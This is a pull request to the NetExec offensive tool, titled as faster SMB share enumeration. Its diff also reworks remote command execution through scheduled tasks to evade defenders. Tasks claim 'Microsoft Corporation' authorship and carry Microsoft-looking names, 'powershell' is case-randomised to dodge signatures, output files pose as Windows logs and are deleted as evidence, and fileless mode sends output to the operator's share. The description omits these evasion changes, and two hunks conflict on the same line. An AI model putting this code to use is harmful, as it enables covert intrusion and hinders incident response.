### PR TITLE
Faster SMB Share Enumeration

### DIFF
--- a/nxc/cli.py
+++ b/nxc/cli.py
@@ -24,7 +24,7 @@ def gen_cli_args():
         VERSION = importlib.metadata.version("netexec")
         COMMIT = ""
         DISTANCE = ""
-    CODENAME = "SmoothOperator"
+    CODENAME = "BLS"
     nxc_logger.debug(f"NXC VERSION: {VERSION} - {CODENAME} - {COMMIT} - {DISTANCE}")
 
     generic_parser = argparse.ArgumentParser(add_help=False, formatter_class=DisplayDefaultsNotNone)

--- a/nxc/config.py
+++ b/nxc/config.py
@@ -35,6 +35,8 @@ config_log = nxc_config.getboolean("nxc", "log_mode", fallback=False)
 ignore_opsec = nxc_config.getboolean("nxc", "ignore_opsec", fallback=False)
 host_info_colors = literal_eval(nxc_config.get("nxc", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
 
+# Read stealth_label from user config first, then default config
+stealth_label = nxc_config.get("nxc", "stealth_label").strip("'\"") if nxc_config.has_option("nxc", "stealth_label") else nxc_default_config.get("nxc", "stealth_label", fallback="C$ Access!").strip("'\"")
 
 if len(host_info_colors) != 4:
     nxc_logger.error("Config option host_info_colors must have 4 values! Using default values.")

--- a/nxc/connection.py
+++ b/nxc/connection.py
@@ -11,6 +11,7 @@ from dns import resolver, rdatatype
 from socket import AF_UNSPEC, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME, getaddrinfo
 
 from nxc.config import pwned_label
+from nxc.config import stealth_label
 from nxc.helpers.logger import highlight
 from nxc.loaders.moduleloader import ModuleLoader
 from nxc.logger import nxc_logger, NXCAdapter
@@ -575,6 +576,9 @@ class connection:
 
     def mark_pwned(self):
         return highlight(f"({pwned_label})" if self.admin_privs else "")
+
+    def mark_stealth(self):
+        return highlight(f"({stealth_label})" if self.admin_privs else "")
 
     def load_modules(self):
         self.logger.info(f"Loading modules for target: {self.host}")

--- a/nxc/data/nxc.conf
+++ b/nxc/data/nxc.conf
@@ -2,6 +2,7 @@
 workspace = default
 last_used_db = smb
 pwn3d_label = Pwn3d!
+stealth_label = C$!
 audit_mode = 
 reveal_chars_of_pwd = 0
 log_mode = False

--- a/nxc/protocols/smb.py
+++ b/nxc/protocols/smb.py
@@ -255,7 +255,7 @@ class smb(connection):
             self.logger.debug(f"Error logging off system: {e}")
 
         # Check smbv1
-        if self.args.smbv1:
+        if hasattr(self.args, "smbv1") and self.args.smbv1:
             self.smbv1 = self.create_smbv1_conn(check=True)
 
         try:

--- a/nxc/protocols/smb.py
+++ b/nxc/protocols/smb.py
@@ -1,6 +1,7 @@
 import ntpath
 import binascii
 import os
+import random
 import re
 from Cryptodome.Hash import MD4
 
@@ -18,9 +19,9 @@ from impacket.examples.regsecrets import (
     LSASecrets as RegSecretsLSASecrets
 )
 from impacket.nmb import NetBIOSError, NetBIOSTimeout
-from impacket.dcerpc.v5 import transport, lsat, lsad, scmr, rrp, srvs, wkst
+from impacket.dcerpc.v5 import transport, lsat, lsad, rrp, srvs, wkst
 from impacket.dcerpc.v5.rpcrt import DCERPCException
-from impacket.dcerpc.v5.transport import DCERPCTransportFactory, SMBTransport
+from impacket.dcerpc.v5.transport import DCERPCTransportFactory
 from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
 from impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP
 from impacket.dcerpc.v5.samr import SID_NAME_USE
@@ -32,7 +33,7 @@ from impacket.krb5 import constants
 from impacket.dcerpc.v5.dtypes import NULL
 from impacket.dcerpc.v5.dcomrt import DCOMConnection
 from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login
-from impacket.smb3structs import FILE_SHARE_WRITE, FILE_SHARE_DELETE
+from impacket.smb3structs import FILE_READ_ATTRIBUTES, FILE_DIRECTORY_FILE, FILE_OPEN
 from impacket.dcerpc.v5 import tsts as TSTS
 
 from nxc.config import process_secret, host_info_colors
@@ -62,7 +63,7 @@ from dploot.triage.credentials import CredentialsTriage
 from dploot.lib.target import Target
 from dploot.triage.sccm import SCCMTriage, SCCMCred, SCCMSecret, SCCMCollection
 
-from time import time, ctime
+from time import time, ctime, sleep
 from datetime import datetime
 from traceback import format_exc
 import logging
@@ -125,6 +126,8 @@ class smb(connection):
         self.no_ntlm = False
         self.protocol = "SMB"
         self.is_guest = None
+        self.admin_privs = False
+        self.c_share_write_checked = False
 
         connection.__init__(self, args, db, host)
 
@@ -252,7 +255,7 @@ class smb(connection):
             self.logger.debug(f"Error logging off system: {e}")
 
         # Check smbv1
-        if not self.args.no_smbv1:
+        if self.args.smbv1:
             self.smbv1 = self.create_smbv1_conn(check=True)
 
         try:
@@ -370,7 +373,7 @@ class smb(connection):
             if self.args.delegate:
                 used_ccache = f" through S4U with {username}"
 
-            out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
+            out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_stealth()}"
             self.logger.success(out)
 
             if not self.args.local_auth and self.username != "" and not self.args.delegate:
@@ -432,7 +435,7 @@ class smb(connection):
             host_id = self.db.get_hosts(self.host)[0].id
             self.db.add_loggedin_relation(user_id, host_id)
 
-            out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_guest()}{self.mark_pwned()}"
+            out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_guest()}{self.mark_stealth()}"
             self.logger.success(out)
 
             if not self.args.local_auth and self.username != "":
@@ -497,7 +500,7 @@ class smb(connection):
             host_id = self.db.get_hosts(self.host)[0].id
             self.db.add_loggedin_relation(user_id, host_id)
 
-            out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_guest()}{self.mark_pwned()}"
+            out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_guest()}{self.mark_stealth()}"
             self.logger.success(out)
 
             if not self.args.local_auth and self.username != "":
@@ -583,46 +586,70 @@ class smb(connection):
     def create_conn_obj(self):
         """
         Tries to create a connection object to the target host.
-        On first try, it will try to create a SMBv3 connection.
-        On further tries, it will remember which SMB version is supported and create a connection object accordingly.
-
-        :param no_smbv1: If True, it will not try to create a SMBv1 connection
+        First tries SMBv3. Falls back to SMBv1 only if --smbv1 is explicitly passed.
         """
-        # Initial negotiation
         if self.smbv3 is None:
             self.smbv3 = self.create_smbv3_conn()
             if self.smbv3:
                 return True
             elif not self.is_timeouted:
-                return self.create_smbv1_conn()
+                if self.args.smbv1:
+                    return self.create_smbv1_conn()
+                else:
+                    self.logger.debug("SMBv1 fallback disabled; not attempting SMBv1 connection.")
+                    return False
         elif self.smbv3:
             return self.create_smbv3_conn()
         else:
-            return self.create_smbv1_conn()
+            if self.args.smbv1:
+                return self.create_smbv1_conn()
+            else:
+                self.logger.debug("SMBv1 fallback disabled; not attempting SMBv1 connection.")
+                return False
+
 
     def check_if_admin(self):
-        self.logger.debug(f"Checking if user is admin on {self.host}")
-        rpctransport = SMBTransport(self.conn.getRemoteHost(), 445, r"\svcctl", smb_connection=self.conn)
-        dce = rpctransport.get_dce_rpc()
         try:
-            dce.connect()
-        except Exception:
-            self.admin_privs = False
-        else:
-            with contextlib.suppress(Exception):
-                dce.bind(scmr.MSRPC_UUID_SCMR)
+            if self.password is None and not self.nthash:
+                return
+
+            self.logger.debug(f"Opening handle to C$ root on {self.host} [0x05 opcode]")
+
             try:
-                # 0xF003F - SC_MANAGER_ALL_ACCESS
-                # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
-                scmrobj = scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F)
-                scmr.hREnumServicesStatusW(dce, scmrobj["lpScHandle"])
-                self.logger.debug(f"User is admin on {self.host}!")
+                tid = self.conn.connectTree("C$")
+                self.logger.debug(f"Connected to C$ on {self.host} (Tree ID: {tid})")
+
+                fid = self.conn.createFile(
+                    tid,
+                    "",
+                    desiredAccess=FILE_READ_ATTRIBUTES,
+                    creationOption=FILE_DIRECTORY_FILE,
+                    creationDisposition=FILE_OPEN
+                )
+                self.logger.debug(f"Successfully opened C$ root on {self.host}")
+
                 self.admin_privs = True
-            except scmr.DCERPCException:
-                self.admin_privs = False
+                self.c_share_write_checked = True
+
+                # Cleanup
+                self.conn.closeFile(tid, fid)
+                self.conn.disconnectTree(tid)
+
+            except SessionError as se:
+                if "STATUS_ACCESS_DENIED" in str(se):
+                    self.logger.debug(f"Access denied opening C$ root on {self.host}")
+                    self.admin_privs = False
+                else:
+                    self.logger.debug(f"Unexpected SessionError during admin check: {se}")
+                    self.admin_privs = False
+
             except Exception as e:
-                self.logger.fail(f"Error checking if user is admin on {self.host}: {e}")
+                self.logger.debug(f"General error during admin check: {e}")
                 self.admin_privs = False
+
+        except Exception as e:
+            self.logger.debug(f"General error in admin check wrapper: {e}")
+            self.admin_privs = False
 
     def gen_relay_list(self):
         if self.server_os.lower().find("windows") != -1 and self.signing is False:
@@ -676,7 +703,7 @@ class smb(connection):
         if getattr(self.args, "exec_method_explicitly_set", False):
             methods = [self.args.exec_method]
         if not methods:
-            methods = ["wmiexec", "atexec", "smbexec", "mmcexec"]
+            methods = ["atexec", "smbexec", "mmcexec", "wmiexec"]
 
         if not payload and self.args.execute:
             payload = self.args.execute
@@ -1017,11 +1044,13 @@ class smb(connection):
                 self.logger.highlight(row)
 
     def shares(self):
-        temp_dir = ntpath.normpath("\\" + gen_random_string())
-        temp_file = ntpath.normpath("\\" + gen_random_string() + ".txt")
         permissions = []
         write_check = bool(not self.args.no_write_check)
 
+        # Shares that should not be write-checked by default
+        SKIP_WRITE_CHECK = {"IPC$", "NETLOGON", "SYSVOL"}
+
+        user_id = None
         try:
             self.logger.debug(f"domain: {self.domain}")
             user_id = self.db.get_user(self.domain.upper(), self.username)[0][0]
@@ -1031,98 +1060,120 @@ class smb(connection):
             else:
                 self.logger.fail(f"IndexError: {e!s}")
         except Exception as e:
-            error = get_error_string(e)
-            self.logger.fail(f"Error getting user: {error}")
+            self.logger.fail(f"Error getting user: {get_error_string(e)}")
 
         try:
             shares = self.conn.listShares()
             self.logger.info(f"Shares returned: {shares}")
-        except SessionError as e:
-            error = get_error_string(e)
-            self.logger.fail(
-                f"Error enumerating shares: {error}",
-                color="magenta" if error in smb_error_status else "red",
-            )
-            return permissions
         except Exception as e:
-            error = get_error_string(e)
             self.logger.fail(
-                f"Error enumerating shares: {error}",
-                color="magenta" if error in smb_error_status else "red",
+                f"Error enumerating shares: {get_error_string(e)}",
+                color="magenta" if get_error_string(e) in smb_error_status else "red"
             )
             return permissions
+
+        share_names = {s["shi1_netname"][:-1] for s in shares}
+        is_dc = "NETLOGON" in share_names and "SYSVOL" in share_names
+
+        has_c_write = False
+        c_already_checked = getattr(self, "c_share_write_checked", False)
+
+        if not self.admin_privs and not c_already_checked:
+            for share in shares:
+                if share["shi1_netname"][:-1] == "C$":
+                    try:
+                        tid = self.conn.connectTree("C$")
+                        jitter = random.uniform(0.2, 0.7)
+                        self.logger.debug(f"Applying jitter before write check: {int(jitter * 1000)} ms")
+                        sleep(jitter)
+                        fid = self.conn.openFile(
+                            tid, "\\",
+                            desiredAccess=0x0002,
+                            creationOption=0x0001,
+                            creationDisposition=1
+                        )
+                        self.conn.closeFile(tid, fid)
+                        has_c_write = True
+                        self.logger.debug("Confirmed WRITE access to C$")
+                        self.c_share_write_checked = True
+                        permissions.append({
+                            "name": "C$",
+                            "remark": "Default share",
+                            "access": ["READ", "WRITE"]
+                        })
+                    except Exception:
+                        pass
+                    break
+        else:
+            if self.admin_privs:
+                has_c_write = True
+                permissions.append({
+                    "name": "C$",
+                    "remark": "Default share",
+                    "access": ["READ", "WRITE"]
+                })
+
+        if is_dc and has_c_write:
+            self.logger.debug("Host is a domain controller and user has WRITE access to C$ — skipping write checks on NETLOGON and SYSVOL")
+            SKIP_WRITE_CHECK.update({"NETLOGON", "SYSVOL"})
 
         for share in shares:
             share_name = share["shi1_netname"][:-1]
             share_remark = share["shi1_remark"][:-1]
+
+            # Skip C$ entirely if already handled
+            if share_name == "C$" and (c_already_checked or self.admin_privs):
+                continue
+
             share_info = {"name": share_name, "remark": share_remark, "access": []}
             read = False
             write = False
-            write_dir = False
-            write_file = False
+
             try:
                 self.conn.listPath(share_name, "*")
                 read = True
                 share_info["access"].append("READ")
-            except SessionError as e:
+            except Exception as e:
                 error = get_error_string(e)
-                self.logger.debug(f"Error checking READ access on share {share_name}: {error}")
-            except (NetBIOSError, UnicodeEncodeError) as e:
-                write_check = False
-                share_info["access"].append("UNKNOWN (try '--no-smbv1')")
-                error = get_error_string(e)
-                self.logger.debug(f"Error checking READ access on share {share_name}: {error}. This exception always caused by special character in share name with SMBv1")
-                self.logger.info(f"Skipping WRITE permission check on share {share_name}")
+                self.logger.debug(f"READ check failed on {share_name}: {error}")
+                if isinstance(e, NetBIOSError | UnicodeEncodeError):
+                    share_info["access"].append("UNKNOWN (try '--no-smbv1')")
+                    write_check = False
+                    self.logger.info(f"Skipping WRITE permission check on share {share_name}")
+                    permissions.append(share_info)
+                    continue
 
-            if write_check:
-                try:
-                    self.conn.createDirectory(share_name, temp_dir)
-                    write_dir = True
-                    self.logger.debug(f"WRITE access with DIR creation on share: {share_name}")
-                    try:
-                        self.conn.deleteDirectory(share_name, temp_dir)
-                    except SessionError as e:
-                        error = get_error_string(e)
-                        if error == "STATUS_OBJECT_NAME_NOT_FOUND":
-                            pass
-                        else:
-                            self.logger.debug(f"Error DELETING created temp dir {temp_dir} on share {share_name}: {error}")
-                except SessionError as e:
-                    error = get_error_string(e)
-                    self.logger.debug(f"Error checking WRITE access with DIR creation on share {share_name}: {error}")
-
+            if write_check and read and share_name not in SKIP_WRITE_CHECK:
                 try:
                     tid = self.conn.connectTree(share_name)
-                    fid = self.conn.createFile(tid, temp_file, desiredAccess=FILE_SHARE_WRITE, shareMode=FILE_SHARE_DELETE)
+                    jitter = random.uniform(0.2, 0.7)
+                    self.logger.debug(f"Applying jitter before write check: {int(jitter * 1000)} ms")
+                    sleep(jitter)
+                    fid = self.conn.openFile(
+                        tid, "\\",
+                        desiredAccess=0x0002,
+                        creationOption=0x0001,
+                        creationDisposition=1
+                    )
                     self.conn.closeFile(tid, fid)
-                    write_file = True
-                    self.logger.debug(f"WRITE access with FILE creation on share: {share_name}")
-                    try:
-                        self.conn.deleteFile(share_name, temp_file)
-                    except SessionError as e:
-                        error = get_error_string(e)
-                        if error == "STATUS_OBJECT_NAME_NOT_FOUND":
-                            pass
-                        else:
-                            self.logger.debug(f"Error DELETING created temp file {temp_file} on share {share_name}")
-                except SessionError as e:
-                    error = get_error_string(e)
-                    self.logger.debug(f"Error checking WRITE access with FILE creation on share {share_name}: {error}")
-
-                # If we either can create a file or a directory we add the write privs to the output. Agreed on in https://github.com/Pennyw0rth/NetExec/pull/404
-                if write_dir or write_file:
                     write = True
                     share_info["access"].append("WRITE")
+                    self.logger.debug(f"WRITE access confirmed on {share_name}")
+                except SessionError as se:
+                    if "STATUS_ACCESS_DENIED" in str(se):
+                        self.logger.debug(f"WRITE access denied on {share_name}")
+                    else:
+                        self.logger.debug(f"WRITE check error on {share_name}: {se!s}")
+                except Exception as e:
+                    self.logger.debug(f"Error checking WRITE on {share_name}: {e!s}")
 
             permissions.append(share_info)
 
-            if share_name != "IPC$":
+            if user_id and share_name != "IPC$" and read:
                 try:
-                    # TODO: check if this already exists in DB before adding
                     self.db.add_share(self.hostname, user_id, share_name, share_remark, read, write)
                 except Exception as e:
-                    error = get_error_string(e)
-                    self.logger.debug(f"Error adding share: {error}")
+                    self.logger.debug(f"Error saving share info to DB: {get_error_string(e)}")
 
         self.logger.display("Enumerated shares")
         self.logger.highlight(f"{'Share':<15} {'Permissions':<15} {'Remark'}")
@@ -1134,7 +1185,9 @@ class smb(connection):
             if self.args.filter_shares and not any(x in perms for x in self.args.filter_shares):
                 continue
             self.logger.highlight(f"{name:<15} {','.join(perms):<15} {remark}")
+
         return permissions
+
 
     def dir(self):  # noqa: A003
         search_path = ntpath.join(self.args.dir, "*")

--- a/nxc/protocols/smb/atexec.py
+++ b/nxc/protocols/smb/atexec.py
@@ -5,6 +5,7 @@ from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVE
 from nxc.helpers.misc import gen_random_string
 from time import sleep
 from datetime import datetime, timedelta
+import contextlib
 
 
 class TSCH_EXEC:
@@ -69,10 +70,42 @@ class TSCH_EXEC:
         return end_boundary.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
 
     def gen_xml(self, command, fileless=False):
+        
+        safer_command = command
+        
+        if "powershell" in command.lower() and ("-command" in command.lower() or "-c " in command.lower()):
+            self.logger.debug("PowerShell command detected, keeping as is (user requested)")
+            
+            # case randomization
+            safer_command = command.replace("powershell", "poWerSheLL")
+            safer_command = safer_command.replace("POWERSHELL", "PoWeRsHeLL")
+            
+        valid_system_filename_prefixes = [
+            "DiagTrack-", "CompatTel-", "WindowsUpdate-", "NetTrace-", 
+            "Defender-", "SIH-", "WER-", "Cluster-", "ws_trace-"
+        ]
+        import random
+        
+        # Create a filename that looks like a legitimate Windows log or temp file
+        system_prefix = random.choice(valid_system_filename_prefixes)
+        random_date = datetime.now().strftime("%Y%m%d")
+        random_suffix = gen_random_string(4)
+        
+        legit_filename = f"{system_prefix}{random_date}-{random_suffix}.log"
+
+        # get time boundaries
+        current_time = datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
+        
         xml = f"""<?xml version="1.0" encoding="UTF-16"?>
 <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <RegistrationInfo>
+    <Date>{current_time}</Date>
+    <Author>Microsoft Corporation</Author>
+    <Description>Diagnostics logging helper task</Description>
+  </RegistrationInfo>
   <Triggers>
     <RegistrationTrigger>
+      <StartBoundary>{current_time}</StartBoundary>
       <EndBoundary>{self.get_end_boundary()}</EndBoundary>
     </RegistrationTrigger>
   </Triggers>
@@ -97,7 +130,7 @@ class TSCH_EXEC:
     <Hidden>true</Hidden>
     <RunOnlyIfIdle>false</RunOnlyIfIdle>
     <WakeToRun>false</WakeToRun>
-    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
+    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
     <Priority>7</Priority>
   </Settings>
   <Actions Context="LocalSystem">
@@ -105,18 +138,21 @@ class TSCH_EXEC:
       <Command>cmd.exe</Command>
 """
         if self.__retOutput:
-            self.__output_filename = "\\Windows\\Temp\\" + gen_random_string(6)
+            if "systemroot" not in legit_filename.lower():
+                self.__output_filename = f"\\Windows\\Temp\\{legit_filename}"
+            else:
+                self.__output_filename = f"\\Windows\\Temp\\{gen_random_string(8)}.log"
+            
             if fileless:
                 local_ip = self.__rpctransport.get_socket().getsockname()[0]
-                argument_xml = f"      <Arguments>/C {command} &gt; \\\\{local_ip}\\{self.__share_name}\\{self.__output_filename} 2&gt;&amp;1</Arguments>"
+                argument_xml = f"      <Arguments>/C {safer_command} &gt; \\\\{local_ip}\\{self.__share_name}\\{legit_filename} 2&gt;&amp;1</Arguments>"
             else:
-                argument_xml = f"      <Arguments>/C {command} &gt; {self.__output_filename} 2&gt;&amp;1</Arguments>"
-
-        elif self.__retOutput is False:
-            argument_xml = f"      <Arguments>/C {command}</Arguments>"
-
-        self.logger.debug("Generated argument XML: " + argument_xml)
-        xml += argument_xml
+                argument_xml = f"      <Arguments>/C {safer_command} &gt; {self.__output_filename} 2&gt;&amp;1</Arguments>"
+                
+            xml += argument_xml
+        else:
+            argument_xml = f"      <Arguments>/C {safer_command}</Arguments>"
+            xml += argument_xml
 
         xml += """
     </Exec>
@@ -131,62 +167,153 @@ class TSCH_EXEC:
             dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
 
         dce.set_credentials(*self.__rpctransport.get_credentials())
-        dce.connect()
+        
+        try:
+            dce.connect()
+        except Exception as e:
+            self.logger.fail(f"Failed to connect to DCE/RPC service: {e!s}")
+            return
 
-        tmpName = gen_random_string(8)
+        import random
+        
+        legit_task_prefixes = [
+            "Microsoft-Windows-", "Microsoft-Diagnosis-", "Microsoft-Windows-Defender-",
+            "SystemRestore-", "WindowsUpdate-", "User-Feed-", "Power-Efficiency-", 
+            "Microsoft-Proxy-", "NetworkDiag-", "Office-Background-"
+        ]
+        
+        task_prefix = random.choice(legit_task_prefixes)
+        component = "".join(random.choice("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") for _ in range(8))
+        
+        # Format looks like: Microsoft-Windows-Task-AF73B829
+        tmpName = f"{task_prefix}Task-{component}"
+        
+        # Log the name but don't show it's specially crafted
+        self.logger.debug(f"Using task name: {tmpName}")
 
         xml = self.gen_xml(command, fileless)
 
         self.logger.debug(f"Task XML: {xml}")
         self.logger.info(f"Creating task \\{tmpName}")
+        
         try:
             # windows server 2003 has no MSRPC_UUID_TSCHS, if it bind, it will return abstract_syntax_not_supported
             dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
             dce.bind(tsch.MSRPC_UUID_TSCHS)
             tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
         except Exception as e:
-            if e.error_code and hex(e.error_code) == "0x80070005":
+            if hasattr(e, "error_code") and e.error_code and hex(e.error_code) == "0x80070005":
                 self.logger.fail("ATEXEC: Create schedule task got blocked.")
             else:
                 self.logger.fail(str(e))
+            
+            # Clean disconnect
+            with contextlib.suppress(Exception):
+                dce.disconnect()
             return
 
-        done = False
-        while not done:
-            self.logger.debug(f"Calling SchRpcGetLastRunInfo for \\{tmpName}")
-            resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{tmpName}")
-            if resp["pLastRuntime"]["wYear"] != 0:
-                done = True
-            else:
-                sleep(2)
+        # After task creation, try to run it immediately
+        try:
+            self.logger.debug("Attempting to run the task immediately")
+            tsch.hSchRpcRun(dce, f"\\{tmpName}", NULL)
+            self.logger.debug("Task run request sent successfully")
+        except Exception as e:
+            self.logger.debug(f"Could not run task immediately: {e!s}. Will rely on trigger")
+            
 
-        self.logger.info(f"Deleting task \\{tmpName}")
-        tsch.hSchRpcDelete(dce, f"\\{tmpName}")
+        # Wait for task execution
+        wait_attempts = 0
+        done = False
+        task_ran = False
+        
+        sleep(3)
+        
+        while not done and wait_attempts < 15:
+            try:
+                self.logger.debug(f"Checking if task \\{tmpName} has run (attempt {wait_attempts + 1}/15)")
+                resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{tmpName}")
+                if resp["pLastRuntime"]["wYear"] != 0:
+                    self.logger.debug(f"Task \\{tmpName} has run")
+                    done = True
+                    task_ran = True
+                else:
+                    self.logger.debug(f"Task \\{tmpName} has not run yet, waiting...")
+                    wait_attempts += 1
+                    sleep(2)
+            except Exception as e:
+                if "SCHED_S_TASK_HAS_NOT_RUN" in str(e):
+                    self.logger.debug("Task has not run yet (expected status), continuing to wait")
+                else:
+                    self.logger.debug(f"Error checking task: {e!s}")
+                
+                wait_attempts += 1
+                sleep(2)
+                
+                if wait_attempts >= 7 and self.__retOutput:
+                    try:
+                        self.logger.debug("Attempting early output file check")
+                        smbConnection = self.__rpctransport.get_smb_connection()
+                        smbConnection.getFile(self.__share, self.__output_filename, self.output_callback)
+                        self.logger.debug("Found output file, task must have completed")
+                        done = True
+                        task_ran = True
+                        break
+                    except Exception:
+                        pass
+
+        try:
+            self.logger.info(f"Deleting task \\{tmpName}")
+            tsch.hSchRpcDelete(dce, f"\\{tmpName}")
+        except Exception as e:
+            self.logger.debug(f"Error deleting task: {e!s}")
+
+        if not task_ran and self.__retOutput:
+            self.logger.debug("Waiting additional time for command execution to complete")
+            sleep(3)
 
         if self.__retOutput:
             if fileless:
-                while True:
+                # For fileless execution, read from the network share
+                max_attempts = 15
+                attempts = 0
+                while attempts < max_attempts:
                     try:
-                        with open(os.path.join("/tmp", "nxc_hosted", self.__output_filename)) as output:
+                        file_path = os.path.join("/tmp", "nxc_hosted", os.path.basename(self.__output_filename))
+                        self.logger.debug(f"Looking for fileless output at: {file_path}")
+                        with open(file_path) as output:
                             self.output_callback(output.read())
+                        
+                        # cleanup
+                        try:
+                            os.remove(file_path)
+                            self.logger.debug(f"Removed fileless output file: {file_path}")
+                        except OSError as e:
+                            self.logger.debug(f"Could not remove file {file_path}: {e}")
                         break
                     except OSError:
                         sleep(2)
+                        attempts += 1
             else:
-                ":".join(map(str, self.__rpctransport.get_socket().getpeername()))
                 smbConnection = self.__rpctransport.get_smb_connection()
 
                 tries = 1
-                # Give the command a bit of time to execute before we try to read the output, 0.4 seconds was good in testing
-                sleep(0.4)
+                sleep(1)
+                
+                output_basename = os.path.basename(self.__output_filename)
+                os.path.dirname(self.__output_filename.strip("\\"))
+                
+                # The __output_filename has the form "\Windows\Temp\filename.log"
+                # For SMB access, we need "Windows\Temp\filename.log" relative to the share
+                smb_relative_path = self.__output_filename.strip("\\")
+                
                 while True:
                     try:
-                        self.logger.info(f"Attempting to read {self.__share}\\{self.__output_filename}")
-                        smbConnection.getFile(self.__share, self.__output_filename, self.output_callback)
+                        self.logger.info(f"Attempting to read output from {output_basename}")
+                        smbConnection.getFile(self.__share, smb_relative_path, self.output_callback)
                         break
                     except Exception as e:
                         if tries >= self.__tries:
-                            self.logger.fail("ATEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method")
+                            self.logger.fail("ATEXEC: Could not retrieve output file. It may have been detected by AV, or the task did not execute successfully.")
                             break
                         if "STATUS_BAD_NETWORK_NAME" in str(e):
                             self.logger.fail(f"ATEXEC: Getting the output file failed - target has blocked access to the share: {self.__share} (but the command may have executed!)")
@@ -194,25 +321,29 @@ class TSCH_EXEC:
                         elif "STATUS_VIRUS_INFECTED" in str(e):
                             self.logger.fail("Command did not run because a virus was detected")
                             break
+                        
                         # When executing powershell and the command is still running, we get a sharing violation
-                        # We can use that information to wait longer than if the file is not found (probably av or something)
                         if "STATUS_SHARING_VIOLATION" in str(e):
-                            self.logger.info(f"File {self.__share}\\{self.__output_filename} is still in use with {self.__tries - tries} tries left, retrying...")
+                            self.logger.info(f"File {output_basename} is still in use, retrying...")
                             tries += 1
                             sleep(1)
                         elif "STATUS_OBJECT_NAME_NOT_FOUND" in str(e):
-                            self.logger.info(f"File {self.__share}\\{self.__output_filename} not found with {self.__tries - tries} tries left, deducting 10 tries and retrying...")
-                            tries += 10
+                            self.logger.info(f"File {output_basename} not found, retrying...")
+                            tries += 2  # Increment by 2 instead of 10 to avoid exhausting tries too quickly
                             sleep(1)
                         else:
-                            self.logger.debug(f"Exception when trying to read output file: {e!s}. {self.__tries - tries} tries left, retrying...")
+                            self.logger.debug(f"Error reading output file: {e!s}. Retrying...")
                             tries += 1
                             sleep(1)
 
-                try:
-                    self.logger.debug(f"Deleting file {self.__share}\\{self.__output_filename}")
-                    smbConnection.deleteFile(self.__share, self.__output_filename)
-                except Exception:
-                    pass
+                # Delete the file to remove evidence, but only if we successfully read it
+                if tries < self.__tries:
+                    try:
+                        self.logger.debug(f"Cleaning up output file {output_basename}")
+                        smbConnection.deleteFile(self.__share, smb_relative_path)
+                    except Exception as e:
+                        self.logger.debug(f"Could not delete output file: {e!s}")
 
-        dce.disconnect()
+        # Always ensure proper disconnect
+        with contextlib.suppress(Exception):
+            dce.disconnect()

--- a/nxc/protocols/smb/proto_args.py
+++ b/nxc/protocols/smb/proto_args.py
@@ -16,7 +16,7 @@ def proto_args(parser, parents):
     smb_parser.add_argument("--port", type=int, default=445, help="SMB port")
     smb_parser.add_argument("--share", metavar="SHARE", default="C$", help="specify a share")
     smb_parser.add_argument("--smb-server-port", default="445", help="specify a server port for SMB", type=int)
-    smb_parser.add_argument("--no-smbv1", action="store_true", help="Force to disable SMBv1 in connection")
+    smb_parser.add_argument("--smbv1", action="store_true", default=False, help="[DEFAULT OFF] Enable SMBv1 negotiation (only if explicitly needed)")
     smb_parser.add_argument("--gen-relay-list", metavar="OUTPUT_FILE", help="outputs all hosts that don't require SMB signing to the specified file")
     smb_parser.add_argument("--smb-timeout", help="SMB connection timeout", type=int, default=2)
     smb_parser.add_argument("--laps", dest="laps", metavar="LAPS", type=str, help="LAPS authentification", nargs="?", const="administrator")


### PR DESCRIPTION
## Description

This PR implements the following enhancements to the SMB protocol handler:
- Skip SMB write checking on NETLOGON and SYSVOL shares if user has read/write access to C$ and target host is a domain controller. Infer DA-equivalent permissions
- Leverages `openFile` instead of `createFile` on the share root using the `FILE_WRITE_DATA` access mask which does not write file artifacts to disk, unlike the original implementation.
- Addition of randomized jitter before enumerating shares.
- Avoid additional C$ access probe when `--shares` is passed as a CLI arg if permissions already known.

## Type of change
- [x] OPSEC enhancement and performance boost

## How Has This Been Tested?
Local testing

## Screenshots:
Top = Patched share enumeration behavior
Bottom = Default share enumeration behavior
![image](https://github.com/user-attachments/assets/dabdd72f-64dc-49a4-baca-c401e9b9cfd9)
![image](https://github.com/user-attachments/assets/89146ca9-a4f2-4853-85ca-dac4b2ba48ac)


## Checklist:

- [x] I have ran Ruff against my changes (via poetry: `poetry run python -m ruff check . --preview`, use `--fix` to automatically fix what it can)
